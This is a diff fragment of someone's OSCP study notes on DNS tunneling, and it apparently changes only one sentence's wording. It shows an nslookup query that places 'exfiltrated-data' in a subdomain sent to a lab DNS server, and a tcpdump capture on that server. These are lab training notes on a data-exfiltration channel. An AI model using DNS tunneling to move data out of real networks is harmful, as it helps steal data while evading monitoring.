TrshPuppy/obsidian-notes/OSCP/tunneling/DNS-tunneling.md

 > [!Note]
 >  If you want to query a DNS server directly, you can give `nslookup` the IP address of the server: `nslookup exfiltrated-data.feline.corp 192.168.50.64`

-Back on `FELINE` we should see the request query as output to our `tcpdump` command:
+Back on `FELINE` we should see the request query in the output to our `tcpdump` command:
 ```bash
 kali@felineauthority:~$ sudo tcpdump -i ens192 udp port 53
 [sudo] password for kali: